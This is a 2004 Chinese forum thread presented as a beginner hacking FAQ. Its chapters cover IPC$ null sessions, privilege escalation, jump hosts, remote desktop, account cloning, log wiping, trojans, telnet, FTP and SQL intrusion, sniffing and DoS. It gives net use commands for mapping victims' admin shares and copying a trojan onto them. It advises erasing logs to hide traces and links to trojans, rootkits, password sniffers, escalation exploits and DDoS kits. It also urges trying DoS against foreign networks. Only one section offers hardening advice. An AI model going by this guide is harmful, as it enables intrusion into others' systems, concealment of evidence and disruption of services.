答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2、确认你的命令没有打错。正确的命令是: net use \\目标IP\ipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端

口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,本论坛没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛盾的结

论,十分棘手。而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致

后就不适合在本文章里探讨了。各位看着办吧,呵呵。
三、怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是adm

in权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能

否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是

不行的话(比如有防火墙,杀不了)建议放弃。
四、怎样映射和访问默认共享?
答:使用命令net use z: \\目标IP\c$ 密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \\IP\d$\path\muma.exe

。或者再映射也可以,只是不用用户名和密码了:net use y: \\IP\d$ 。然后 copy muma.exe

y:\path\muma.exe 。当路径中包含空格时,须用""将路径全引住。
五、如何删除映射和ipc$连接?
答:用命令 net use \\IP\ipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
六、连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各

种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程

和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办

法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑

开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
七、怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止建立空连接
  首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]

把RestrictAnonymous(DWORD)的键值改为:00000001。
  3,禁止自动打开默认共享
 

对于server版,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Para

meters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把Au

toShareWks(DWORD)的键值改为:00000000。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续

就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方

便。
D、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了,端口过滤看这里:
过配置本地策略来禁止139/445端口的连接:
http://www.sixthroom.com/ailan/f ... otID=284&ID=284
以上问题部份基本未做修改。原因很简单应该说的,和能想到的,前辈都写出来了。


第十一章------关于扫描出的漏洞

简单说明:
很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时,不要急着把它们帖在论坛上,期望别人来

为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的,一部分漏洞过

时了,一部分是误报。如果你希望了解的多一些,最好经常到发布漏洞比较快的网站走一走,漏洞的利用是一

个不段积累的过程。时间长了相信你就体会到了。
新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16354963.html

缘煦的签名档

I AM TURE COLOR MAN       

缘煦

缘煦

个人积分:0

个人官职:论坛庶民

帖子总数:164

图片总数:0

官职:论坛庶民 500 个人中心 我的博客
发短消息我的帖子

黑客安全技术入门常见问题集! (点击:1457)

缘煦 发表于 新塘新世界花园论坛 2004-08-13 20:05:48

【3楼】 漏洞搜索:

绿盟的引擎 http://www.nsfocus.net/index.php?act=sec_bug
蓝盾的引擎 http://www.landun.org/zhongyao/sousuo.htm
补天网的引擎 http://www.patching.net/otherweb/leak/leakindex.asp
安全焦点的引擎 http://www.xfocus.net/vuln/index.php
小凤居的引擎 http://lilitou1.myetang.com/


相关帖子:
一个CGI漏洞的发现和利用
http://www.sixthroom.com/ailan/f ... otID=285&ID=285
cgi漏洞大全 http://www.sixthroom.com/ailan/f ... otID=293&ID=293
常见CGI漏洞及应对二 http://www.sixthroom.com/ailan/f ... otID=286&ID=286
常见CGI漏洞及应对一 http://www.sixthroom.com/ailan/f ... otID=287&ID=287
Windows 2000漏洞集锦1

http://www.sixthroom.com/ailan/f ... otID=288&ID=288
Windows 2000漏洞集锦2

http://www.sixthroom.com/ailan/f ... otID=289&ID=289
Windows 2000漏洞集锦3
http://www.sixthroom.com/ailan/f ... otID=290&ID=290
Windows 2000漏洞集锦4
http://www.sixthroom.com/ailan/f ... otID=291&ID=291
Windows 2000漏洞集锦5
http://www.sixthroom.com/ailan/f ... otID=292&ID=292
ASP漏洞大全 http://www.sixthroom.com/ailan/f ... otID=294&ID=294
IIS漏洞整理一 http://www.sixthroom.com/ailan/f ... otID=295&ID=295
IIS漏洞整理二 http://www.sixthroom.com/ailan/f ... otID=296&ID=296
中国网络安全响应中心各种漏洞大全 http://www.cns911.com/holes/linux/list.php


第十二章------关于提升权限

简单说明:
黑客的最终目标就是得到root(即win中的admin)权限。一个真正的黑客会把一次入侵当做是自己的一件作品,

不会轻易放弃,但是有些漏洞(典型的如Unicode漏洞、ASP木马)不能直接获得管理员权限,所以必然需要提

升权限。一些新手可能会犯这类错误,以为中了木马、获得了shell就能控制一切。结果就出现“为何不能加用

户”、“为何不能开3389”等问题。2000及更高版本os承袭了NT的安全结构,多重机制环环相扣来保障安全,

特别是帐户安全。无奈安全系统过于庞大,多少会出现漏洞,于是我们就有机会了。 还要补充一点,就是在拿

到一个现成的后门软件,或是一个木马的时候,一定要先看看说明。至少你应该知道这个后门运行后的效果吧

?更有些人上传了某个后门软件或是木马到目标后就认为完事了,你不执行它就是传个地雷上去又有什么用呢




相关工具:
erunasx 利用Debug Registers漏洞提升权限 http://www.qq888.com/down/download.asp?Did=796
Windows NT/2000权限提升工具,可以将任意用户提升到SYSTEM级别的权限。漏洞出在smss.exe中的DEBUG子系

统,所有普通用户都可以通过该漏洞获得对系统中任意进程或线程句柄的控制,从而可以以SYSTEM或管理员权

限执行任意命令。2、使用方法:假设我们已经获得一台机器上的一个GUEST用户(或其他普通用户),现在我

们要这个工具来获得系统最高权限。进行如下步骤:把ERunAsX.exe和ERunAsX.dll这两个文件复制到目标主机

上可访问的目录下,例如C:\下。以GUEST身份运行"ERunAsX 要执行命令",例如"ERunAsX cmd.exe",这时执行

的命令是以SYSTEM 权限运行的...(请注意:具体使用以软件内英文说明为准,内附该BUG解决办法)

PipeUpAdmin 对sp1及更低有效 http://maopao.com/down/download.asp?Did=69
ISPC 利用IIS的漏洞,详见自带说明 http://www.cnsq.net/sq88/down/show.asp?id=572&down=1
PHPBB论坛权限提升

http://www.newyouth.org/softdown ... .0.exploit_code.zip
WIN帮助文件溢出(可用于XP)

http://www.newyouth.org/softdown ... ack/chmoverflow.zip
NT/2K权限提升工具GetAdmin下载 http://www.csdn.net/cnshare/soft/openfile.asp?kind=1&id=9807


相关帖子:
NT/2000提升权限的方法小结

http://www.sixthroom.com/ailan/f ... otID=297&ID=297
关于WIN2000的入侵,以及安全防御等问题(文章包含一次利用U漏洞提高权限的过程)
http://www.sixthroom.com/ailan/f ... otID=298&ID=298
UNICODE漏洞介绍及入侵
http://www.sixthroom.com/ailan/f ... otID=299&ID=299
怎样提升权限,做后门
http://www.sixthroom.com/ailan/f ... otID=300&ID=300
一般用户获取NT服务器Admin权限的方法
http://www.sixthroom.com/ailan/f ... otID=302&ID=302
Windows NT4的安全结构(对新手有些难,了解一下吧)

http://www.sixthroom.com/ailan/f ... otID=303&ID=303


第十三章------关于做代理和跳板

简单介绍:
代理服务器英文全称是Proxy Cerver,其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的

中转站。在一般情况下,我们使用网络浏览器直接去连接其他Internet站点取得网络信息时,须送出Request信

号来得到回答,然后对方再把信息以bit方式传送回来。代理服务器是介于浏览器和Web服务器之间的一台服务

器,有了它之后,浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求,Request信号会先送到

代理服务器,由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且,大部分代理服务器都具有

缓冲的功能,就好象一个大的Cache,它有很大的存储空间,它不断将新取得数据储存到它本机的存储器上,如

果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的,那么它就不重新从Web服务器取数据,而直

接将存储器上的数据传送给用户的浏览器,这样就能显著提高浏览速度和效率。更重要的是:Proxy Server (

代理服务器)是 Internet链路级网关所提供的一种重要的安全功能,它的工作主要在开放系统互联 (OSI) 模型

的对话层,有了对代理的了解,相信你也认识到了什么是跳板。


相关工具:
SocksCap 2.2 SOCKS调度工具 http://www.123gz.com/dzc/download/sc32r231.exe
SkSockServer1.04 代理跳板 http://www.123gz.com/dzc/download/sksockserver.zip
Snake跳板傻瓜版 http://www.123gz.com/dzc/download/sgtb.zip
代理猎手V3.1Beta1简装版 http://www.123gz.com/dzc/download/proxyhunter.zip
FTP Serv-U 4.0 正式汉化版,最常用的ftp服务程序

http://61.159.224.188/makesoftur ... 627E207574756375737
slimftp 隐蔽的ftp服务器 http://www.whitsoftdev.com/files/slimftpd.zip
天雁WEB服务器 不用安装的小型web服务程序

http://www.cnzzz.com/download/do ... 2254709&Url=100
多种服务程序下载
http://www.zdnet.com.cn/download/windows/business/swlist/0,2008004954,39000268r,00.htm?sort=5


相关帖子:
代理、肉鸡、跳板的概念

http://www.sixthroom.com/ailan/f ... otID=305&ID=305
代理服务器(Proxy)完全解析

http://www.sixthroom.com/ailan/f ... otID=307&ID=307
如何使用代理服务器 http://www.sixthroom.com/ailan/f ... otID=309&ID=309
简单制作跳板 http://www.123gz.com/dzc/sksockserver-cusky.htm
Serv-U设置教程 http://www.enanshan.com/ftp/
SocksCap32 使用详解 http://www.123gz.com/dzc/sockscap32.htm
在肉鸡上安装FTP服务器

http://www.sixthroom.com/ailan/f ... otID=306&ID=306
利用 unicode 漏洞,轻松建立自己的代理服务器
http://www.123gz.com/dzc/sksockserver-nicky-1.htm#top1
特别推荐猎手与蚂蚁收藏馆 http://www.123gz.com/ (绝对值得一看)


第十四章------关于终端服务(3389)


简单说明:
windows终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。图形界面和

不影响当前本地用户的特性是它的最大优点。由于它是2000server及以上版本自带的功能,因此成为一个绝好

的“后门”而倍受青睐。而且win98也可以成为客户端,这使得在网吧“工作”成为可能。有一点需要强调一下

使用客户端登陆远程主机对当前工作的用户没有影响,而且一切动作本地用户都是看不到的。也就是说远程登

陆和本地用户是在不相同的空间,两者互不干扰。


相关工具:
WIN2000客户端
http://zudu2000.myetang.com/soft/win2k.rar
winxp下的客户端 功能比2000下的更强大
http://zudu2000.myetang.com/soft/windowsXP.zip
终端服务程序的一个补丁 使本地和远程间能复制文本

http://www.sandflee.net/wawa/tools/rdpclip_hotfix.exe
web版终端客户端 使用浏览器调用ActiveX控件访问终端服务
http://www.enanshan.com/down/tswebsetup.exe
C3389.EXE 修改终端服务端口号的工具
http://www.sandflee.net/down/show.asp?id=228&down=1
Win2k终端服务器端所需文件包
http://www.netsill.com/download/download.asp?Did=1965
3389自动安装程序-djshao正式版5.0
http://netsill.com/download/download.asp?Did=2019
开启3389工具(如果要想让远程主机开启WIN2000的终端服务,请把3389.exe也传到远程主机上并运行。然后等

待一个漫长的时间(由于是无人执守安装)。就可以看到远程主机的3389端口会被打开。)
http://netsill.com/download/download.asp?Did=1991
W2K终端服务客户端安装版
http://www.sandflee.net/down/show.asp?id=39&down=1


相关帖子:
关于远程启动终端服务的帖子

http://www.sixthroom.com/ailan/f ... otID=385&ID=385
终端服务问题常见问答
http://www.sixthroom.com/ailan/f ... otID=386&ID=386
图文讲解输入法漏洞入侵
http://www.sandflee.net/txt/list.asp?id=22
3389自动安装工具教程
http://netsill.com/download/download.asp?Did=2068
3389动画教程(密码china)
http://netsill.com/download/download.asp?Did=1990
修改终端客户端端口动画教程
http://netsill.com/download/download.asp?Did=2009
3389资料 http://www21.brinkster.com/srob/wawa/wawa/3389txt.htm


第十五章------关于克隆帐号


简单说明:
克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是SAM\Domains\Account

\Users下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,

查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况

。即所谓的克隆帐号。(前辈就是前辈把大家想到的都写出来了,我实在不知道这里在加些什么了。看来也只

有这样了。大家如果还有什么不明白的就到论坛里发贴子吧。
具体的看这里:
解剖安全帐号管理器(SAM)结构

http://www.sixthroom.com/ailan/f ... otID=387&ID=387
明白原理后就可以手动或者用现成的工具克隆帐号了。


相关工具:
克隆ca.exe http://www.netxeyes.org/CA.exe
检查克隆cca.exe http://www.netxeyes.org/CCA.exe
手动克隆需要SYSTEM权限,用它 psu.exe
http://www.sandflee.net/down/show.asp?id=176&down=1

相关帖子:
工具克隆:ca和cca 请访问作者主页 http://www.netxeyes.org/main.html
psu用法:psu.exe提升为system权限

http://www.sixthroom.com/ailan/f ... otID=390&ID=390
手动克隆:如何克隆管理员帐号

http://www.sixthroom.com/ailan/f ... otID=388&ID=388
如何克隆管理员帐号的补充

http://www.sixthroom.com/ailan/f ... otID=389&ID=389


常见问题和回答:
1,使用ca时,出现connect **.**.**.** ...Error是怎么会事?
答:ca和cca需要目标开放ipc$,请确认可以与目标建立ipc$。参见“关于ipc$和空连接”
2,使用ca时,出现“Processing....ERROR”是怎么会事?
答:这说明对方主机缺少文件msvcp60.dll,想办法传个过去放在系统目录下就可以了。
3,克隆过程没有错误,但cca没有显示该帐号克隆成功,无法使用被克隆的帐号。
答:这一般是因为对方主机是域控制器,注册表中sam结构不同,工具失效。暂时无法解决。
4,手动克隆无法访问注册表SAM键怎么办?
答:在命令行方式,可以使用psu工具获得SYSTEM权限,从而访问SAM键。详见上面说明。
在图形界面,运行regedt32.exe,找到SAM键并选中。“安全”子菜单栏里有一项“权限”,打开它。在里面设

置administrator和SYSTEM一样有完全控制权限。关闭regedt32再打开,就可以访问SAM键了。
新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16354976.html

缘煦的签名档

I AM TURE COLOR MAN       

缘煦

缘煦

个人积分:0

个人官职:论坛庶民

帖子总数:164

图片总数:0

官职:论坛庶民 500 个人中心 我的博客
发短消息我的帖子

黑客安全技术入门常见问题集! (点击:1333)

缘煦 发表于 新塘新世界花园论坛 2004-08-13 20:06:16

【4楼】 第十六章------关于日志


简单说明:
日志是系统自动根据你个人的设置所记载的所定义配置中的活动情况及基本资料,这对一个管理员来说是很重要

的,管理员可以根据日志发现系统的异常情况,并且及时做出处理.相反对于一个黑客来说,这也是至关重要的,因

为xx作系统的许多服务都带日志。最重要和明显的就是IIS和事件日志。它们最有可能记录你的IP和行动。而且

相对于其他的如ftp、计划任务、telnet的日志更为管理员重视。另外,如果你获得了图形界面的shell来用IE

,还可能会留cookie,而这些东西对于你来说,都是至命的.消灭它没商量.^_^


相关工具:
cleanIISlog 清除web日志 http://www.netxeyes.org/cleaniislog.zip
Clean IIS Log(清除IIS日志)http://arm.533.net/hack/cliislog.zip
Clear Event Log(清除事件日志)http://arm.533.net/hack/clearel.zip
elsave.exe 清除事件日志 http://www.sandflee.net/down/show.asp?id=196


相关帖子:
NT/2000下删日志的方法

http://www.sixthroom.com/ailan/f ... otID=383&ID=383
windows日志的保护与伪造

http://www.sixthroom.com/ailan/f ... otID=382&ID=382
清除日志文件的深入探讨
http://www.sixthroom.com/ailan/f ... otID=384&ID=384


第十七章------关于后门和木马


简单说明:
后门一般是指一个系统或是应用软件存在的一些设计缺陷,或是设计人员为了方便解决问题而特别留下的后门,

总之无论怎么样?如果后门被其他人知道,或是在发布软件之前没有删除后门,那么它就成了安全风险。还有一

种就是攻击者留下为了方便以后进入而留下的.木马其实也属于后门的一种.


相关工具:
wollf-v1.5 功能挺多的木马 http://www.isgrey.com/down/show.asp?id=144&down=1
WinShell v5.0 精巧的Telnet服务器 http://www.isgrey.com/down/show.asp?id=200&down=1
广外女生1.52C http://netsill.com/download/download.asp?Did=1815
冰 河YZKZERO最终变异版 http://netsill.com/download/download.asp?Did=1799
WinEggDropShell V1.32 http://netsill.com/download/download.asp?Did=2069
ASP Cmd(ASP木马,可远程执行命令)http://arm.533.net/control/aspcmd.zip
CGI BackDoor(CGI后门)http://arm.533.net/hack/cgibackdoor.zip
Root Kit(NT后门)http://arm.533.net/hack/rk.zip
网络神偷 V3.4 反向连接,上线通知 http://www.isgrey.com/down/show.asp?id=239&down=1
Sunx Backdoor(Unix内核后门)http://arm.533.net/hack/sunxkdoor.tar


相关资料:
蓝色火焰教程 http://www.fycity.com/hanke/banjc/bluefire/bluefire.htm
网络神偷教程 http://www.fycity.com/hanke/banjc/netst/netst.htm
冰河木马教程 http://www.fycity.com/hanke/banjc/binghe/binghe.htm
广外女生教程 http://www.fycity.com/hanke/banjc/gwgirl/gwgirl.htm
网络精灵教程 http://www.fycity.com/hanke/banjc/netjl/netjl.htm
无赖小子教程 http://www.fycity.com/hanke/banjc/wulai/wulai.htm
hacker的后门技巧 http://www.sixthroom.com/ailan/f ... otID=381&ID=381

第十八章------关于打补丁

简单说明:
如果你发现肉鸡有漏洞的话,一般可以用上面提到的漏洞搜索引擎找到相应的补丁下载URL。大的补丁比如sp2

就找微软要吧(特别推荐windows update,可以使用WEB方式的搜索功能,查看到你现在有哪些补丁没有下安装

,以免因为系统漏洞给你或你的公司带来不必要的损失。在攻击别人之前自己的安全一定要做好,否则,呵呵

,你就哭去吧)。


相关资料:
肉鸡补丁教程 http://www.sixthroom.com/ailan/f ... otID=380&ID=380


相关工具:
WINXP-SP1补丁 http://www.05110.com/download/show.asp?id=156&down=1
win2000sp3中文版 http://www.cnns.net/msfix/w2ksp3_cn.exe
win2000sp3中文版 http://211.147.1.39/color/download.asp?id=450&downid=1
win2000sp3英文版 http://www.cnns.net/msfix/w2ksp3_en.exe
Windows2k安全补丁集SP1下载(简体中文)
http://download.microsoft.com/do ... 5/CN/w2kSP2SRP1.exe
Windows2k安全补丁集SP1下载(英文)
http://download.microsoft.com/do ... N-US/w2kSP2SRP1.exe
电脑之家各类补丁下载 http://download.pchome.net/system/patch/
CERNET网络应急响应组各类补丁下载 http://www.ccert.edu.cn/patch/index.php
黑客防线各系统补丁下载 http://hacker.com.cn/down/sort.asp?zhuid=28


第十九章------关于telnet


简单说明:
telnet是一种命令行方式的终端服务,其优势在于客户端和服务端都是系统自带的。它是除了木马外,获得cmd

下shell的最好选择。使用该服务时,最常遇到的问题就是NTLM认证方式。当NTLM=2时,要求你必须使用你系统

当前的帐户和密码登陆;当NTLM=0时直接要求你输入帐户及密码进行验证;NTLM=1则是前一种要求失败后再用

后一种。由于系统默认的NTLM为2,所以想用你得到的帐户登陆,要么在自己系统上也建立一个用户名密码都一

样的帐户,要么想办法更改对方的NTLM。(TELNET我个人非常喜欢,原因很简单,他是系统本身自带的,100%

不会出现被查杀的情况)TELNET使用方法很简单直接在CMD下键入telnet remote-computer-name(or IP)既可。


相关工具:
telnethack 远程开启telnet服务 http://www.bluedon.com/download/down.asp?id=310&sort=6
Win Shell(最精巧的Telnet服务器软件)http://arm.533.net/hack/winshell.zip
iCmd(Telnet服务器,执行后自动23端口) http://arm.533.net/hack/icmd.zip
Inet Spy(Telnet客户端)http://arm.533.net/hack/inetspy.zip
NT Shell(Telnet服务器(自带客户端),可互传文件,还可能获取Admin权限)

http://arm.533.net/hack/ntshell.zip
Ncx99(Telnet服务器,执行后自动99端口)http://arm.533.net/hack/ncx99.zip
Putty(Telnet客户端,图形界面)http://arm.533.net/hack/putty.zip
RTCS(灰色轨迹测试版)http://www.sandflee.net/down/show.asp?id=245&down=1


相关帖子:
最快速登录WIN2K TELNET 服务 http://www.sandflee.net/txt/list.asp?id=58
不需任何工具,远程屏蔽telnet服务的ntlm认证

http://www.sixthroom.com/ailan/f ... otID=377&ID=377
基于Telnet协议的攻击
http://www.sixthroom.com/ailan/f ... otID=376&ID=376
telnet 跳板攻击
http://www.sixthroom.com/ailan/f ... otID=378&ID=378
防范针对telnet的攻击
http://www.sixthroom.com/ailan/f ... otID=379&ID=379


第二十章------关于ftp入侵


简单说明:
FTP是英文File Transfer Protocol(文件传输协议)的缩写。顾名思义,FTP就是专门用来传输文件的协议,也

就是说通过FTP我们可以在Internet网上的任意两台计算机间互传文件。
  一些人容易将FTP与Telnet混淆,而实际上Telnet是将用户的计算机当成远端计算机的一台终端,用户在完

成远程登陆后,具有远端计算机上的本地用户一样的权限。而FTP没有给予用户这种地位,它只允许用户对远方

计算机上的文件进行有限的xx作,包括查看文件、交换文件以及改变文件目录等。
即使得到上传权限也无法直接执行程序,利用办法可以参考win98共享的入侵。一些较早版本的ftp服务软件,

尤其是UNIX平台上的,有溢出或越权访问的漏洞,相关信息请查看后面关于漏洞的部分。


相关工具:
FTP Server(运行后自动21端口)http://arm.533.net/hack/ftpsrv.zip
晶莹剔透的FTP软件 http://casdk.swmirror.com/cftp_setup.exe
FTP Filter(扫描一个网段的FTP端口,速度快)http://arm.533.net/scan/ftpfilter.zip
Crack FTP(即可作FTP工具,又可破解密码)http://arm.533.net/detect/crackftp.zip


相关资料:
FTP命令简介
http://www.sixthroom.com/ailan/f ... otID=374&ID=374
晶莹剔透的FTP软件介绍 http://www.hanzify.org/software/ftpdl/crystal_1.htm
允许匿名登陆ftp服务器危险性研究

http://www.sixthroom.com/ailan/f ... otID=371&ID=371
匿名FTP的漏洞 (Anonymous FTP)
http://www.sixthroom.com/ailan/f ... otID=372&ID=372
FTP入侵教程
http://www.sixthroom.com/ailan/f ... otID=373&ID=373
TFTP和FTP在入侵时的简单设置(图文)
http://www.sixthroom.com/ailan/f ... otID=375&ID=375


第二十一章------关于sql

简单说明:
 SQL是Structured Query Language(结构化查询语言)的缩写,它是目前使用最广泛的数据库语言,SQL是由

IBM发展起来的,后来被许多数据库软件公司接受而成为了业内的一个标准。
就象SQL的名字一样,我们可以通过容易理解的查询语言,来和数据库打交道,从数据库中得到我们想要的数据

。对于SQL语言,有两个组成部分:
DML(data manipulation language):它们是SELECT、UPDATE、INSERT、DELETE,就象它的名字一样,这4条

命令是用来对数据库里的数据进行xx作的语言。
DDL(data definition language):DDL比DML要多,主要的命令有CREATE、ALTER、DROP等,DDL主要是用在定

义或改变表(TABLE)的结构,数据类型,表之间的链接和约束等初始化工作上,他们大多在建立表时使用。
了解这两个部分的不同对于你今后使用时有很多方便,因为许多SQL语言中的约束也是根据这个分类来划分的,

SQL作为一个ANSI标准,一直在不断改进。以下的讨论都是针对它的。由于具有管理员权限的帐号sa默认密码为

空,且低版本的sql有漏洞能直接获得密码。因此它也成为入侵的一种捷径(如果存在漏洞的话)。用客户端工

具连接后直接当cmd用吧。


相关工具:
mssqltools 攻击sql的工具集 http://www.cnsq.net/sq88/down/show.asp?id=335&down=1
SQL Brower(SQL数据库浏览工具)http://arm.533.net/hack/sqlbrower.zip
SQL Cmd(利用SQL Server执行命令)http://arm.533.net/hack/sqlcmd.zip
SQLEXEC mssql连接工具 http://arm.533.net/hack/sqlexec.zip
SQL Ping http://arm.533.net/hack/sqlping.zip
SQL Remote Cmd(利用SQL Server执行命令,小榕软件,控制台界面)http://arm.533.net/hack/sqlrcmd.zip


相关帖子:
去除SA的xp_cmdshell权限

http://www.sixthroom.com/ailan/f ... otID=361&ID=361
SQL数据库的一些攻击方法
http://www.sixthroom.com/ailan/f ... otID=367&ID=367
SQLServer的漏洞和一些突破口
http://www.sixthroom.com/ailan/f ... otID=365&ID=365
SQL完全简明手册
http://www.sixthroom.com/ailan/f ... otID=364&ID=364
SQL Server2000的安全配置
http://www.sixthroom.com/ailan/f ... otID=362&ID=362
SQL SERVER 2000通讯管道后复用劫持
http://www.sixthroom.com/ailan/f ... otID=369&ID=369
浅谈SQL SERVER数据库口令的脆弱性
http://www.sixthroom.com/ailan/f ... otID=370&ID=370
sql扩展的删除与恢复
http://www.sixthroom.com/ailan/f ... otID=368&ID=368

第二十二章------关于sniffer

简单说明:
Sniffer既可以是硬件,也可以是软件,它用来接收在网络上传输的信息。网络可以是运行在各种协议之下的。

包括Ethernet、TCP/IP、ZPX等等(也可以是其中几种协议的联合)。放置Sniffer的目的是使网络接口(在这

个例子中是以太网适配器)处于广播状态(promiscuous mode),从而可从截获网络上的内容。
新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16354985.html

缘煦的签名档

I AM TURE COLOR MAN       

缘煦

缘煦

个人积分:0

个人官职:论坛庶民

帖子总数:164

图片总数:0

官职:论坛庶民 500 个人中心 我的博客
发短消息我的帖子

黑客安全技术入门常见问题集! (点击:1301)

缘煦 发表于 新塘新世界花园论坛 2004-08-13 20:06:39

【5楼】 相关工具:
ARPSniffer 基于交换环境的Sniffer工具 http://www.netxeyes.org/ARPSniffer.rar
SnifferPRO4.6 最好的嗅探器之一 http://www.bluedon.com/download/down.asp?id=2268
commview 也是嗅探器

http://download.pchome.net/php/d ... 34247.zip&svr=3
ARPKiller1.3 可以查谁在嗅探 http://61.129.112.107/starkun/tools/sniffer/ARPKiller1.3.zip
lcrzo V4.13 http://www.heibai.net/download/show.php?id=2842&down=4
ngSniff-1.0 http://www.heibai.net/download/show.php?id=2933&down=4
SQLServerSniffer http://www.heibai.net/download/show.php?id=2967&down=4
Iris4.00.2 http://www.heibai.net/download/show.php?id=3115&down=4
pswmonitor2.0 监听基于网页的邮箱密码 http://exlyg.8u8.com/soft2/pswmonitor2.zip
Win Sniffer Console http://arm.533.net/analyze/wsc.zip
Win Sniffer http://arm.533.net/analyze/winsnif.zip
Win Dump http://arm.533.net/analyze/windump.zip
天眼 http://arm.533.net/analyze/tianyan.zip
Natas http://arm.533.net/analyze/natas.zip
流影 Sniffer http://arm.533.net/analyze/fssniffer.zip
GUNiffer 命令行方式的嗅探工具 http://arm.533.net/analyze/guniffer.zip
EffeTech HTTP Sniffer 3.4 http://harryliu.diy.163.com/effetech/EffeTechHTTPSniffer.exe


相关资料:
sniffer简述 http://www.sixthroom.com/ailan/f ... otID=352&ID=352
关于sniffer http://www.sixthroom.com/ailan/f ... otID=351&ID=351
网络监听技术概览 http://www.sixthroom.com/ailan/f ... otID=353&ID=353
实现网络监听的工具 http://www.sixthroom.com/ailan/f ... otID=354&ID=354
网络监听的防范方法 http://www.sixthroom.com/ailan/f ... otID=355&ID=355
安全的交换机 http://www.sixthroom.com/ailan/f ... otID=356&ID=356
NetXray使用说明总汇 http://www.sixthroom.com/ailan/f ... otID=357&ID=357
如何在交换环境下SNIFFER

http://www.sixthroom.com/ailan/f ... otID=358&ID=358
Windows 交换环境下ARP Sniffer的实现

http://www.sixthroom.com/ailan/f ... otID=359&ID=359
Sniffer Pro 英文教学录像 http://www.heibai.net/download/show.php?id=2983&down=4
ARPKiller 使用手册 http://www.sixthroom.com/ailan/f ... otID=360&ID=360


第二十三章------关于DoS和DDos
简单说明:
拒绝服务攻击只在很特殊的情况才有应用价值。它完全是一种破坏和令人厌恶的行为。因此十分不推荐新手尝

试。各位了解一下它的原理就可以了。这种攻击破坏性极大,而且很难避免。希望大家不要拿来做坏事,更不要

对国内的网络进行试验。要试就找个日本,美国的试去。最好的办法还是你自己卖两台机器,做这台前面攻击

哪台,呵呵,可是要有¥¥¥呀。哈哈。


相关工具:
SYN潜伏攻击者 http://www.heibai.net/download/show.php?id=2731&down=4
独裁者 DDos工具 http://www.heibai.net/download/show.php?id=2834&down=4
kn-Ping http://www.heibai.net/download/show.php?id=2536&down=4
三个ddos工具 http://www.heibai.net/download/show.php?id=2706&down=4
LAND Attack v1.5 http://www.chinesehack.org/down/show.asp?id=2661&down=1
DDOS工具包 http://arm.533.net/bomb/ddos.zip
FD.dos攻击1.0 http://www.cnsq.net/sq88/down/show.asp?id=488&down=1
DDOS攻击工具 http://www.cnsq.net/sq88/down/show.asp?id=198&down=1


相关帖子:
DOS攻击原理以及常见方法介绍

http://www.sixthroom.com/ailan/f ... otID=350&ID=350
典型DoS攻击原理及抵御措施

